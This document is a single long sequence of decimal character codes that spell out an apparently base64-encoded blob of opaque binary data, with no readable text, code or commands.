118 97 111 51 83 106 110 47 114 114 87 90 48 110 73 100 118 57 86 117 71 81 100 65 99 50 84 122 119 83 48 122 57 49 101 55 98 121 116 87 85 66 118 50 120 110 81 100 81 53 113 66 72 115 102 111 84 107 43 106 73 97 75 104 73 71 75 54 48 57 112 102 98 70 100 51 103 115 75 85 48 83 48 48 87 87 49 51 88 49 89 117 108 109 54 99 51 65 100 118 70 55 68 118 54 71 84 122 50 52 83 83 72 103 79 72 110 67 53 108 116 47 97 88 43 74 73 76 115 110 74 71 53 102 103 43 78 102 57 81 51 76 122 113 52 86 69 108 98 51 110 99 75 119 111 55 82 81 65 86 72 77 68 85 105 88 79 48 65 75 105 85 74 110 100 54 99 55 88 83 100 70 107 84 110 121 109 100 57 117 70 121 77 116 99 83 57 114 72 86 66 112 100 51 99 84 79 111 43 68 67 67 86 105 85 49 120 72 116 118 84 81 79 43 107 82 109 121 89 118 90 119 49 110 111 105 107 88 71 104 83 117 107 72 120 121 89 104 57 101 112 49 110 86 121 117 50 53 115 100 50 121 82 67 48 103 105 71 119 68 120 88 49 54 119 110 43 43 103 74 74 54 66 82 53 111 50 77 108 102 99 86 85 51 99 73 114 56 116 74 87 101 117 51 121 55 117 76 49 53 47 80 55 83 106 76 71 86 78 111 121 103 111 117 57 83 73 114 48 57 90 57 75 117 68 50 108 100 50 49 47 66 48 74 43 118 106 118 76 47 104 49 48 84 76 105 49 97 112 120 76 111 67 53 86 113 114 108 119 117 97 112 119 47 109 117 112 53 116 68 77 57 56 70 114 110 118 84 90 87 72 86 81 81 100 80 51 117 110 106 55 72 83 68 118 109 55 106 113 79 117 54 110 120 86 87 112 111 51 115 81 70 101 71 105 82 55 51 80 84 74 102 73 115 82 111 98 86 70 97 83 74 117 53 75 50 116 113 108 120 51 106 109 106 49 82 51 118 107 82 116 109 56 119 68 99 99 67 72 77 84 85 90 111 76 80 89 56 98 48 99 51 98 82 105 118 52 77 78 81 99 67 50 89 115 98 102 120 66 52 57 85 80 74 112 88 122 103 85 109 112 120 71 54 117 74 80 72 50 119 80 87 53 56 121 97 69 119 53 74 99 87 86 47 90 103 65 111 114 114 119 69 65 99 79 88 90 115 90 77 117 90 57 70 87 84 67 57 68 112 105 84 87 119 117 66 52 49 70 80 57 53 76 76 70 99 100 82 56 104 111 98 73 48 70 97 109 56 65 87 78 49 102 76 76 65 56 112 115 43 98 115 116 81 113 53 113 54 87 109 71 112 76 114 79 65 50 73 122 122 98 122 51 88 99 103 118 84 53 47 76 82 102 52 87 76 113 74 119 111 116 116 75 74 56 81 98 77 54 83 50 118 79 114 69 54 54 102 108 43 120 118 121 55 103 76 98 77 88 102 113 79 70 55 53 118 70 67 101 120 106 110 52 98 117 54 82 50 50 111 43 85 75 108 119 49 51 66 55 52 69 103 113 113 48 74 67 70 67 109 100 68 67 97 115 105 76 108 118 100 71 56 88 101 87 43 112 52 122 105 97 121 89 116 43 81 50 99 76 48 108 43 51 82 117 98 69 77 78 84 81 79 101 79 49 118 48 111 79 72 107 97 66 103 54 80 99 89 85 76 108 103 80 108 87 54 72 54 101 113 73 72 117 70 50 99 103 113 75 83 89 57 105 68 87 111 67 84 54 51 48 78 68 57 100 99 81 88 85 116 51 77 121 71 113 54 71 53 86 72 106 66 82 86 71 66 53 86 82 87 102 57 70 72 49 113 67 89 43 107 52 84 67 107 119 107 113 47 52 50 65 78 82 83 47 70 115 70 56 86 71 102 74 83 98 75 49 89 69 75 77 65 88 116 82 108 70 86 87 69 89 119 78 74 88 84 81 65 70 100 103 117 113 69 117 50 101 79 47 77 110 99 71 54 75 56 106 77 55 69 75 97 120 50 73 110 111 106 55 65 70 86 54 78 79 55 72 114 112 112 68 117 99 97 112 105 69 120 113 89 88 86 73 47 90 66 86 76 67 122 109 120 112 52 47 120 67 72 118 81 115 75 83 120 56 74 69 101 109 75 48 121 72 109 84 74 81 50 113 116 56 67 89 115 118 49 73 101 101 55 52 109 113 70 112 72 55 99 114 79 71 118 75 48 52 107 106 115 118 105 74 107 55 99 57 117 122 83 47 55 106 97 86 76 112 56 86 77 87 48 105 108 48 112 50 120 56 102 67 120 86 76 106 122 73 43 98 54 77 100 85 68 79 57 50 108 114 67 122 116 72 66 79 90 50 120 112 67 119 109 89 85 67 84 74 48 47 57 90 53 82 106 43 47 79 103 78 98 78 122 116 47 89 49 68 66 115 52 68 121 77 43 65 43 113 78 85 81 43 103 80 43 111 67 82 86 103 100 72 86 75 76 114 71 76 103 52 69 103 48 80 79 51 51 110 80 87 84 121 65 54 102 115 108 52 97 107 108 102 51 99 76 80 55 121 104 81 57 111 85 115 106 90 74 87 105 115 116 56 107 54 118 100 55 98 68 114 72 43 102 53 79 117 66 78 118 68 53 89 66 106 87 56 122 76 118 101 77 47 50 113 118 115 111 85 100 90 100 54 113 82 108 114 80 97 55 66 74 67 87 51 90 117 53 115 108 112 66 120 81 70 97 86 48 90 54 70 102 57 86 108 97 106 113 110 72 84 75 97 86 110 53 121 116 100 83 110 97 114 98 49 108 112 86 87 117 84 108 109 56 102 51 48 53 113 118 57 114 111 50 89 89 118 51 65 105 114 110 66 47 74 90 43 121 89 71 108 67 77 51 121 73 51 49 54 119 43 43 55 105 52 55 73 50 79 81 105 56 111 67 122 78 68 83 98 107 105 87 120 109 68 65 51 75 99 86 108 82 85 55 74 57 69 100 108 87 105 81 110 57 76 74 100 110 48 113 56 71 55 88 88 43 106 117 76 116 99 118 71 108 101 50 119 66 76 99 122 56 112 84 121 79 117 53 76 83 111 105 47 120 88 107 101 99 111 98 120 53 103 97 48 100 77 79 50 113 77 112 67 79 113 98 56 100 89 121 80 54 71 57 78 53 67 90 57 108 86 74 107 106 115 75 75 74 48 86 84 108 50 121 69 72 43 56 57 50 116 82 74 100 43 99 66 82 121 57 47 67 67 77 55 71 66 108 50 106 84 68 97 50 80 118 122 89 66 54 54 80 120 88 83 49 79 113 65 51 109 72 49 51 84 84 79 109 114 51 70 52 122 89 108 68 99 65 120 67 99 110 57 101 119 48 85 85 79 70 51 99 43 69 110 90 52 84 81 48 102 72 90 90 50 66 89 85 105 57 66 90 57 115 120 51 43 97 90 89 102 51 118 110 43 100 109 57 102 70 43 110 113 115 76 88 69 78 102 88 65 79 100 47 113 107 57 103 102 105 109 115 110 101 57 121 48 53 52 89 107 121 78 43 50 115 109 98 47 120 87 110 51 97 101 100 66 72 75 81 117 70 84 71 53 80 68 109 49 118 108 53 122 43 43 119 71 71 98 90 87 49 79 57 106 71 87 76 121 54 108 75 98 101 70 87 107 54 115 114 84 65 120 113 57 102 110 102 56 110 66 100 108 113 114 98 98 52 71 71 114 122 74 121 89 112 72 114 43 66 57 90 99 84 83 104 50 114 88 113 116 114 98 49 109 111 57 86 114 66 109 97 75 73 97 100 79 82 54 112 51 78 116 68 71 86 75 86 70 105 57 122 85 121 85 83 78 54 121 122 75 108 103 54 54 80 87 77 81 114 89 110 77 90 103 48 51 71 69 55 68 51 66 121 86 108 117 109 112 66 68 121 54 65 98 88 88 87 57 48 108 82 73 82 115 114 117 116 57 47 78 78 54 70 90 83 54 115 51 72 77 90 119 114 52 88 55 47 47 76 53 54 55 118 115 98 83 110 68 110 54 77 43 120 83 74 76 117 97 101 84 72 88 121 76 43 119 48 74 68 66 49 78 50 112 73 67 65 89 76 86 49 88 82 48 75 49 116 106 115 121 68 65 51 51 54 65 74 75 81 48 82 49 52 90 57 97 43 116 67 111 87 47 106 55 51 118 84 105 82 85 98 70 112 65 57 100 72 53 51 82 71 49 111 112 111 98 85 86 79 98 68 68 85 117 122 47 119 84 100 79 51 84 101 51 57 48 98 111 111 110 86 87 75 109 90 56 78 108 47 106 116 49 116 111 71 53 117 104 116 52 82 113 83 112 53 72 109 116 119 102 117 53 43 67 85 69 69 49 106 97 120 107 97 99 122 89 75 104 54 118 79 75 55 115 74 69 48 86 120 80 107 122 121 102 114 109 106 110 113 73 72 112 97 115 74 78 106 83 85 69 119 122 81 47 90 105 73 88 74 101 47 88 49 98 75 104 84 104 51 73 65 74 98 78 101 119 70 56 106 69 100 88 115 73 108 113 50 108 100 106 77 84 50 118 107 111 98 68 82 82 74 109 53 100 72 51 100 66 113 53 97 87 108 102 83 69 110 122 102 86 69 115 118 57 81 104 113 84 50 121 113 73 118 84 77 54 100 74 72 76 49 117 47 53 122 120 115 118 116 80 77 51 90 71 90 106 102 48 73 99 51 109 55 122 113 119 73 89 122 69 119 79 97 56 48 76 67 81 117 74 106 70 98 55 97 108 85 98 117 68 110 103 118 77 49 55 122 81 110 83 50 76 76 69 112 89 102 51 115 68 76 117 75 98 56 114 97 74 112 97 87 117 55 52 70 103 121 54 102 71 110 98 103 80 73 114 49 99 51 79 119 49 75 51 54 77 65 97 107 49 80 53 55 121 77 105 122 111 53 115 118 73 83 89 111 98 70 90 117 56 66 73 79 101 108 77 84 71 116 111 117 50 47 47 99 117 90 77 111 79 75 83 56 80 109 83 104 106 99 47 77 120 113 120 106 52 54 85 115 71 54 115 79 48 99 80 80 81 71 74 66 105 122 110 84 120 65 83 51 78 67 97 84 75 90 70 119 97 84 81 119 107 52 90 75 103 87 85 121 57 67 78 105 77 48 69 122 73 56 76 79 103 65 104 67 112 86 70 111 67 106 84 104 43 49 98 106 87 102 71 120 56 75 73 67 49 48 85 119 73 65 75 72 81 119 83 86 57 72 109 111 119 73 103 48 119 109 102 78 71 78 117 47 49 111 99 75 99 107 113 103 107 107 113 106 47 70 100 54 75 76 86 79 115 122 75 104 89 106 72 121 73 87 76 72 51 47 43 86 100 75 88 54 84 84 86 70 100 49 78 119 104 83 88 81 87 122 105 98 104 69 119 90 43 97 121 97 106 66 109 86 66 69 117 112 100 104 87 98 50 71 82 65 78 109 54 82 102 49 77 74 121 89 79 110 78 43 76 122 99 51 87 88 52 83 111 53 108 47 99 69 114 101 88 113 104 97 71 105 115 122 71 68 111 53 74 113 118 49 84 113 102 106 102 117 47 120 43 105 47 113 84 104 78 86 67 76 113 84 117 70 47 102 109 85 109 109 86 114 105 69 67 90 85 90 84 113 78 43 109 57 100 71 50 43 116 57 116 47 87 49 77 102 78 108 107 120 116 118 43 118 68 107 97 88 49 81 79 84 54 102 110 83 90 100 72 119 107 115 76 52 71 103 107 112 75 47 105 114 106 99 99 69 74 99 108 54 117 82 50 72 99 99 100 57 70 77 52 105 117 112 74 89 52 88 65 74 105 109 87 49 73 84 114 100 120 52 51 48 89 80 113 48 48 97 81 111 74 98 81 54 109 113 55 80 67 86 75 69 75 88 122 110 66 75 108 66 48 100 88 73 86 100 84 87 51 52 56 83 109 113 116 69 75 110 57 57 119 108 115 119 53 99 47 87 87 100 109 86 102 50 115 48 114 105 72 85 101 90 97 99 104 87 84 120 115 116 82 52 113 116 90 117 66 74 118 72 111 118 97 85 84 113 57 112 108 90 53 77 119 54 111 109 120 57 52 112 57 82 98 103 73 74 122 75 108 101 75 86 118 50 75 100 102 49 72 53 110 111 109 82 71 113 88 65 104 83 66 105 80 102 75 110 86 104 117 97 103 66 104 51 110 75 81 85 81 106 90 106 86 76 49 110 56 56 43 87 105 100 118 47 113 68 90 56 86 108 72 71 83 119 82 83 50 52 72 86 84 98 86 81 99 87 87 71 104 100 118 43 101 54 85 112 99 81 110 68 50 115 109 73 89 79 50 47 53 52 99 52 51 98 56 43 75 112 51 67 55 120 67 48 105 88 114 98 119 77 51 99 52 113 67 118 114 108 111 50 47 104 114 78 110 50 67 121 50 65 53 101 118 48 87 77 122 86 109 115 67 107 81 51 107 83 121 85 80 81 85 75 84 76 114 50 84 75 114 85 114 71 79 98 114 86 116 101 108 70 112 77 122 68 56 90 109 106 76 122 109 47 86 47 50 122 83 53 101 77 103 102 71 80 76 122 52 86 71 103 66 56 55 113 112 48 53 52 119 80 54 90 52 89 82 79 69 72 79 72 43 89 87 84 79 98 78 112 57 90 110 78 112 85 70 114 97 107 48 71 83 50 114 121 106 54 66 121 84 54 76 77 54 105 43 52 66 82 114 82 86 115 107 105 113 113 66 104 48 78 66 73 48 53 97 118 122 83 120 107 52 73 80 90 117 87 119 111 114 121 55 121 65 103 97 68 105 53 52 90 103 90 65 100 55 87 115 88 111 89 73 88 53 43 98 55 121 53 43 89 70 82 72 89 113 113 122 82 47 84 79 106 116 122 97 122 99 48 99 107 56 76 67 109 102 116 77 72 78 98 114 74 112 79 104 65 110 57 118 68 112 55 122 90 110 48 122 114 50 90 112 97 116 75 70 86 54 74 83 47 107 66 75 120 113 51 114 53 117 50 90 103 120 57 118 86 121 70 88 55 106 66 112 105 101 67 113 104 47 113 79 119 53 72 98 55 53 89 51 86 89 90 110 70 105 103 77 90 80 77 51 83 105 105 67 84 48 43 120 56 102 70 103 100 118 83 89 71 76 72 98 109 114 107 100 119 50 68 113 98 110 71 66 53 106 86 121 116 102 98 84 101 76 103 112 49 72 53 56 110 103 53 106 111 68 122 122 108 99 77 90 71 117 101 67 118 106 75 102 67 120 107 121 109 81 74 90 121 48 90 113 55 65 121 71 110 114 51 66 119 73 50 118 112 116 54 121 56 53 109 86 47 100 52 117 101 113 98 82 43 111 104 87 52 55 87 48 114 105 122 113 121 101 90 51 121 97 102 52 50 86 68 43 98 108 115 98 84 48 70 43 76 118 120 51 111 119 76 79 108 70 108 85 115 122 57 73 78 53 55 65 90 57 57 49 107 101 103 49 47 52 50 84 73 83 109 107 107 117 90 57 70 83 100 88 71 70 109 69 109 84 57 114 103 56 78 110 47 97 74 77 116 80 87 88 70 55 51 75 57 82 57 50 112 53 53 57 78 72 106 71 50 71 116 51 88 97 67 49 86 121 100 88 117 53 107 57 107 120 116 109 55 108 108 115 79 57 67 48 74 106 68 111 50 53 101 86 67 104 83 89 81 50 106 57 78 87 101 76 120 103 73 53 49 90 47 66 103 116 81 65 90 56 50 74 121 103 75 122 48 55 47 77 102 117 69 80 55 72 74 122 117 51 84 67 77 75 122 115 50 49 87 102 101 73 72 52 84 100 77 99 54 117 66 51 74 82 75 122 109 54 47 77 103 103 57 121 89 86 89 111 89 66 105 98 107 122 114 108 47 74 108 47 51 73 90 89 112 122 77 67 103 80 112 100 107 87 57 66 52 98 87 80 72 107 112 98 104 107 114 54 53 117 67 71 113 73 43 52 78 89 116 74 43 57 71 54 55 52 77 116 115 84 119 74 52 71 98 83 108 116 103 76 69 100 98 51 120 81 111 113 122 121 108 57 50 89 97 97 87 50 71 70 52 115 115 49 116 121 107 87 79 122 79 48 113 109 101 65 116 57 84 51 90 73 83 78 80 100 57 116 67 88 111 52 97 67 75 74 47 98 74 56 97 54 115 73 76 43 112 65 89 77 55 74 118 108 48 121 66 47 102 65 78 110 87 81 65 107 72 86 104 82 114 90 118 108 112 99 110 114 79 90 80 101 113 69 83 106 97 106 73 109 84 48 57 121 120 120 85 52 73 88 72 79 118 105 43 47 87 118 79 102 107 117 89 98 80 56 53 102 102 55 81 74 119 99 73 87 81 118 114 98 105 87 73 56 86 79 67 49 87 100 86 87 83 121 74 105 81 71 76 89 79 117 76 97 117 104 105 100 105 53 72 111 117 110 65 48 119 50 70 112 117 118 112 120 88 74 112 52 85 89 85 85 73 51 107 88 90 83 104 82 53 84 75 76 84 119 116 89 108 112 115 102 50 65 79 78 101 117 104 47 113 56 57 88 116 43 72 67 43 66 120 66 43 76 49 99 66 74 83 50 47 110 52 119 116 109 77 80 122 99 68 115 105 115 97 99 88 107 122 109 85 84 120 83 86 87 99 78 89 98 98 99 80 111 69 112 117 51 76 78 98 78 122 83 77 122 87 70 112 84 81 55 77 47 75 53 72 80 43 84 47 89 73 70 67 72 49 54 71 112 117 47 113 57 47 55 116 102 70 66 119 118 106 78 90 66 72 68 78 77 57 88 89 55 77 98 87 103 77 47 82 120 83 82 87 53 79 79 72 118 51 98 80 106 57 76 67 108 66 119 76 121 65 106 52 101 107 71 121 71 114 102 73 99 116 102 84 106 68 65 53 90 101 119 43 78 103 68 84 85 103 71 66 79 119 73 101 71 80 110 82 76 54 97 80 73 83 77 83 116 55 112 67 106 68 48 47 101 90 54 120 118 82 54 116 122 120 70 69 71 89 43 103 75 90 73 109 118 100 122 79 83 81 52 116 90 111 48 79 122 73 114 112 81 77 88 99 74 80 48 80 104 104 97 50 109 114 75 76 69 98 114 116 114 86 117 98 79 82 54 49 109 47 72 51 119 115 54 118 110 110 109 76 80 71 122 55 70 106 51 89 100 73 104 52 110 72 115 43 43 106 57 115 102 71 50 99 65 47 53 110 43 70 108 98 79 55 117 52 43 84 77 84 115 117 81 89 99 69 100 113 48 50 82 114 99 70 100 81 122 51 79 108 80 47 53 43 102 122 99 43 120 51 83 47 48 83 51 98 110 54 80 88 121 53 47 72 90 89 113 51 49 57 117 107 115 117 102 47 81 104 107 83 66 43 83 47 53 74 69 98 83 73 81 101 112 71 53 51 97 66 74 103 49 78 43 100 117 119 80 89 49 76 47 111 80 72 80 121 101 118 50 43 117 79 83 83 80 88 100 55 82 98 118 109 117 98 78 98 87 55 80 55 90 71 49 111 53 55 49 98 78 73 43 43 57 116 99 86 80 76 55 47 72 110 85 72 72 83 80 105 104 74 119 97 56 51 102 115 98 53 72 86 70 109 108 53 57 74 53 75 74 119 106 79 110 108 122 119 47 75 87 106 119 87 99 120 76 106 78 71 83 90 80 84 81 122 99 121 102 76 98 71 66 55 65 54 122 51 112 87 43 117 122 100 115 80 106 120 90 118 48 80 55 90 114 119 113 98 122 79 51 102 98 47 57 110 98 111 97 72 78 103 108 85 56 80 117 90 107 56 102 70 67 86 78 73 55 68 97 53 102 82 84 99 83 115 110 109 115 89 71 100 88 86 75 81 103 55 115 114 79 66 117 103 43 114 73 120 90 89 86 54 104 49 73 109 73 104 97 83 101 121 116 114 72 115 81 89 103 115 75 70 97 70 90 100 48 79 108 112 115 100 120 111 85 80 115 80 87 67 100 115 121 102 56 90 108 117 51 118 115 53 78 109 67 116 47 71 87 69 86 49 98 75 50 114 55 55 88 83 102 112 53 104 49 99 101 84 101 66 74 109 100 88 53 86 89 85 49 108 66 68 84 98 73 76 82 87 76 80 49 66 72 56 56 108 49 74 51 86 49 79 82 115 56 75 82 80 88 111 52 80 121 57 115 72 50 74 56 111 50 116 75 112 89 105 112 81 65 103 79 111 87 122 81 54 121 116 87 87 74 75 89 66 89 106 101 83 81 100 71 74 88 98 48 90 50 97 109 97 48 86 49 65 101 71 106 82 43 87 111 56 102 69 49 98 67 66 76 83 122 99 122 71 85 82 80 88 108 97 50 43 86 99 99 80 55 85 104 113 84 52 87 98 105 48 82 121 67 97 104 98 87 68 103 54 78 122 102 73 120 65 68 82 51 77 72 79 116 76 49 84 70 85 99 54 52 90 50 102 114 49 107 116 48 67 54 76 73 52 90 108 122 51 73 83 73 112 81 107 106 76 65 122 75 119 109 82 56 55 56 85 82 71 107 88 74 66 90 101 51 106 72 75 88 76 114 43 101 116 109 121 119 68 114 118 72 75 81 53 107 99 106 77 86 100 111 98 71 121 111 49 55 88 68 68 85 111 73 109 113 117 73 84 104 100 82 82 99 54 117 119 57 103 49 105 102 69 119 57 98 98 50 101 75 88 117 71 69 100 76 87 79 117 120 98 86 115 74 73 81 74 72 68 79 55 118 69 100 84 108 121 84 118 51 68 67 108 47 70 117 53 110 52 57 105 101 107 101 83 71 66 122 56 71 87 72 70 66 47 90 109 57 55 101 110 81 74 85 89 80 50 86 55 122 47 110 118 112 109 88 70 75 84 114 81 121 107 118 109 80 57 57 100 118 109 66 67 116 114 72 86 75 84 83 47 111 66 108 112 115 100 78 56 110 116 117 53 115 68 117 100 75 84 119 101 54 117 117 51 117 51 115 87 51 107 105 89 67 106 108 98 87 66 49 77 76 73 109 112 88 49 107 88 100 69 88 101 47 76 57 72 110 119 47 55 105 52 97 74 51 78 77 110 73 87 47 43 114 117 114 110 50 82 75 85 82 69 113 82 105 52 120 99 50 122 107 57 43 87 113 101 119 115 72 103 83 74 108 72 99 72 101 82 105 120 70 104 89 87 104 112 98 50 50 76 121 114 51 100 105 56 54 48 49 74 101 55 52 116 118 98 80 118 110 79 122 116 88 82 103 98 109 120 104 75 117 43 120 66 55 87 120 56 75 98 115 122 113 80 56 72 112 108 90 97 87 107 53 103 69 68 79 43 79 43 88 77 52 109 78 100 51 74 84 43 87 47 67 85 71 75 79 51 74 86 51 85 99 71 117 80 115 70 77 83 71 43 80 81 72 77 85 85 109 112 54 122 111 53 111 54 69 43 88 50 118 49 115 97 84 79 116 112 112 81 72 74 53 87 101 52 75 69 85 74 47 50 112 82 76 81 68 112 103 104 98 71 78 115 89 57 75 107 99 55 115 68 54 108 83 87 104 50 57 83 88 108 117 47 118 122 57 74 85 83 69 65 113 66 70 119 108 43 65 84 71 103 107 55 102 79 111 84 43 69 57 74 119 77 43 97 83 76 75 71 55 116 83 78 107 90 76 115 48 113 51 82 43 51 77 65 106 97 55 50 75 56 90 104 100 85 78 88 106 117 54 105 78 114 111 75 87 68 108 122 67 88 116 74 54 102 77 77 71 118 110 73 85 118 119 98 65 52 54 56 55 87 116 75 50 113 76 54 111 75 111 71 84 113 108 68 77 118 101 79 66 107 57 106 50 57 50 57 43 76 114 97 53 76 81 106 52 83 113 88 78 85 111 115 81 86 118 122 78 98 108 66 76 81 51 49 88 98 110 57 115 105 90 105 65 104 90 87 86 52 101 82 115 54 116 109 121 69 114 51 47 110 84 47 65 77 99 65 69 66 72 121 101 90 115 115 55 73 43 87 101 55 77 78 47 86 66 110 70 50 114 90 112 111 110 89 82 82 82 88 71 74 55 83 84 77 54 105 85 105 108 57 117 70 69 90 78 90 68 86 48 87 71 121 120 68 90 116 105 99 65 105 78 67 100 110 117 55 121 86 104 53 117 102 83 53 72 84 43 114 83 57 121 99 70 70 53 84 74 77 115 75 84 120 53 79 90 100 65 65 56 85 78 107 106 121 113 65 54 116 113 53 104 71 48 112 56 57 57 79 75 103 90 101 110 89 119 100 47 53 88 86 81 90 102 65 51 83 119 71 74 109 71 86 84 53 101 90 56 87 118 66 103 111 116 71 78 102 71 85 112 85 49 99 106 53 55 55 51 43 43 98 118 54 109 78 106 120 99 114 114 68 85 121 112 51 106 50 110 74 67 117 66 50 102 105 113 114 77 104 116 89 112 50 76 50 103 56 89 79 87 107 49 70 87 67 81 49 90 87 80 86 51 109 55 105 68 70 118 78 71 118 70 43 100 117 73 48 89 48 69 51 52 73 114 83 53 82 78 53 68 81 50 76 69 80 49 115 113 78 86 114 99 48 81 88 77 71 77 110 89 90 121 107 101 72 118 57 115 85 90 56 101 56 106 112 83 82 104 108 66 100 54 47 43 97 49 86 68 97 88 66 106 89 53 107 102 116 117 75 106 76 51 65 43 48 52 113 78 122 71 113 107 106 88 43 50 54 103 102 97 50 114 115 121 85 112 108 80 52 114 47 56 89 43 49 79 90 98 87 107 75 119 110 80 110 90 110 87 49 113 71 118 118 49 111 48 101 47 105 78 112 57 83 77 80 78 72 120 73 83 54 54 100 119 55 87 106 117 71 77 120 66 99 72 89 101 72 104 89 87 55 54 90 88 86 98 76 97 110 83 89 78 102 54 106 57 50 74 117 122 98 82 56 102 77 117 103 121 110 71 120 116 65 51 113 72 55 49 48 110 119 43 56 104 70 115 80 79 89 98 72 112 84 121 84 50 76 114 43 108 66 88 47 99 51 76 116 120 98 79 76 55 53 109 71 53 74 81 76 109 49 72 114 51 99 69 112 122 55 50 107 56 82 65 99 105 76 115 116 122 80 47 107 76 47 106 98 82 76 52 86 108 114 56 101 79 76 104 90 116 106 49 84 70 74 69 52 54 90 81 100 108 67 87 67 68 90 114 53 114 72 120 77 71 70 68 121 86 121 67 87 119 108 53 101 74 100 108 51 67 82 115 102 72 73 75 99 75 101 82 48 43 66 78 87 73 78 110 101 67 117 97 82 117 75 84 117 57 86 51 86 109 89 111 107 120 67 99 75 119 90 79 120 113 117 72 122 87 109 83 112 114 97 118 68 53 101 106 43 77 67 104 79 48 68 105 87 65 77 55 101 67 118 99 109 105 119 47 73 68 56 118 43 78 53 108 52 70 49 81 86 109 76 112 69 110 47 110 120 75 55 116 119 117 113 85 107 69 84 82 117 69 108 48 116 71 114 117 75 74 55 54 56 76 49 106 55 88 110 55 98 79 47 89 77 107 56 77 104 102 110 103 77 52 85 113 103 119 112 69 52 86 75 82 76 117 55 67 81 86 68 85 57 57 87 111 71 108 87 77 108 116 121 49 86 105 51 70 118 114 73 52 118 90 79 84 114 113 90 57 98 43 111 54 109 106 105 109 84 110 81 109 114 118 98 105 105 87 117 117 50 90 48 77 68 116 99 122 119 103 104 76 77 68 68 103 111 69 73 97 70 105 51 72 67 56 69 65 112 119 109 114 115 117 98 109 72 51 100 100 71 76 90 104 90 121 110 116 66 87 47 84 51 74 89 51 111 67 110 76 90 97 88 49 120 65 105 111 89 72 54 74 113 103 56 67 85 72 75 108 114 117 111 54 110 119 86 118 68 78 54 85 56 112 43 114 73 90 87 71 51 105 69 111 82 87 49 90 112 53 47 88 57 108 105 76 88 109 118 103 98 43 118 110 113 54 55 53 113 121 78 66 67 67 65 52 71 55 111 104 98 102 77 56 48 53 74 81 50 52 101 57 79 70 56 106 99 84 57 87 80 100 107 55 112 120 57 100 47 90 102 79 100 103 101 112 120 86 50 80 80 117 80 52 43 57 97 88 85 102 52 100 117 115 110 69 83 117 56 87 107 110 106 122 69 86 72 67 55 72 51 120 56 103 70 104 101 102 114 122 111 107 115 80 51 118 53 114 111 69 48 98 86 102 57 116 57 113 100 90 88 122 87 83 109 47 109 86 114 81 107 48 85 107 108 112 89 107 109 122 88 50 86 85 47 112 119 108 83 71 76 114 99 80 52 67 103 97 103 116 75 105 73 109 89 78 83 120 53 84 69 57 73 68 108 78 109 104 57 98 120 97 54 113 115 117 78 88 67 65 102 75 55 67 113 113 109 71 80 108 78 106 101 112 73 53 122 75 122 119 105 115 47 122 53 47 86 108 68 53 117 77 107 116 109 88 88 109 67 113 104 48 80 75 50 49 55 88 105 119 97 67 109 103 76 108 68 109 50 98 72 104 73 111 43 54 87 50 108 43 112 103 52 90 86 79 50 108 47 102 113 78 86 114 43 88 47 56 70 87 84 73 79 43 106 116 72 90 57 106 43 80 43 55 73 117 68 80 68 84 90 80 121 71 104 102 122 75 84 85 83 109 116 100 57 106 109 81 70 49 69 86 86 101 73 81 56 120 110 99 67 51 57 50 105 49 120 82 76 121 109 122 55 107 78 76 85 69 105 77 74 98 74 85 90 67 50 74 119 118 80 83 52 89 76 86 116 48 78 102 114 54 55 47 106 119 73 68 67 103 112 99 97 74 87 67 121 78 65 85 119 55 83 87 72 67 49 54 113 86 79 71 114 118 53 113 55 114 53 49 112 86 79 80 54 110 74 69 106 50 79 114 75 74 115 97 68 79 68 102 115 75 69 48 49 76 121 90 57 57 106 115 113 50 50 90 51 74 83 55 119 115 88 77 104 122 78 85 76 77 102 104 73 98 112 53 78 74 47 57 80 89 104 49 81 122 77 47 67 120 99 114 105 103 111 113 65 47 119 83 80 80 56 88 47 66 53 98 84 98 53 85 71 111 98 98 53 90 106 113 89 65 80 90 43 82 121 79 107 86 48 110 53 112 77 89 76 70 57 47 48 101 87 49 104 79 90 118 66 50 106 70 53 120 75 82 78 51 78 51 77 101 117 67 109 71 89 85 54 105 76 77 65 77 54 115 47 50 57 57 66 49 71 51 104 49 108 86 121 75 87 86 89 84 107 103 52 111 55 67 50 43 57 112 69 65 122 68 122 49 114 55 87 114 116 56 120 72 74 74 81 121 111 98 74 85 104 82 121 75 85 104 87 52 52 65 50 74 79 57 87 88 88 114 99 112 75 79 121 118 83 49 103 113 65 74 111 53 104 87 57 116 70 122 105 47 47 104 101 80 98 52 51 99 101 98 100 79 113 115 90 117 97 97 70 48 79 82 78 120 109 114 57 79 51 116 113 86 52 78 87 77 48 68 102 68 43 77 53 80 115 105 56 119 101 72 121 82 69 90 115 47 70 102 52 101 112 98 50 101 54 89 115 101 72 84 54 75 56 105 72 109 108 55 77 88 109 70 51 103 47 110 103 57 105 112 87 102 106 68 69 55 43 89 100 111 68 103 47 122 109 75 87 73 85 119 108 100 48 50 80 108 76 79 103 79 103 86 52 76 52 88 82 116 72 112 112 116 99 81 70 116 48 68 71 101 118 78 79 70 109 49 100 88 113 54 76 117 65 110 103 55 80 56 74 50 48 115 76 83 122 102 79 118 75 67 67 121 77 113 89 97 110 118 119 50 108 97 74 81 122 73 110 74 51 87 86 77 80 115 112 67 99 66 88 69 50 80 105 54 79 109 77 116 89 80 98 47 115 76 65 90 72 55 87 88 74 81 67 109 103 104 99 50 120 71 70 79 89 43 102 98 57 114 101 112 119 100 72 77 110 113 117 100 68 67 81 120 116 118 74 49 88 114 47 66 74 109 121 55 101 81 73 120 103 121 103 105 85 81 84 65 49 99 120 48 79 100 71 48 90 115 50 57 80 98 102 84 43 108 78 105 120 87 85 69 119 53 101 102 122 90 54 79 80 48 70 112 110 98 118 68 55 73 49 70 69 50 83 115 47 57 108 114 120 48 79 107 122 113 54 85 76 122 70 56 53 104 113 115 105 84 43 50 66 122 122 52 52 67 43 112 65 51 52 100 118 115 79 48 104 83 80 87 120 49 99 83 71 114 112 67 69 67 90 76 56 68 68 74 56 65 55 67 53 57 43 119 109 70 121 78 48 71 65 116 113 87 85 116 84 116 122 86 99 77 67 55 106 83 43 47 117 119 89 82 109 89 75 69 47 115 70 69 120 74 54 101 53 90 83 55 50 68 67 122 65 49 53 79 49 85 66 57 80 66 98 111 114 77 89 68 51 80 119 51 87 68 97 90 52 65 43 99 67 80 75 69 106 55 118 119 117 82 88 73 72 86 85 118 115 55 80 51 53 106 103 48 120 66 65 56 76 110 67 104 121 98 97 84 121 55 84 121 70 43 120 116 50 111 101 98 113 75 111 87 51 103 86 117 83 102 54 50 90 48 90 100 113 116 113 115 85 117 56 100 101 68 43 114 116 104 117 43 71 109 81 116 80 83 119 99 99 89 57 100 82 88 88 85 52 117 55 113 122 43 89 82 117 48 77 104 103 102 85 82 111 110 55 72 73 51 84 112 116 99 101 67 78 71 122 84 112 50 100 105 67 86 99 56 119 118 110 120 78 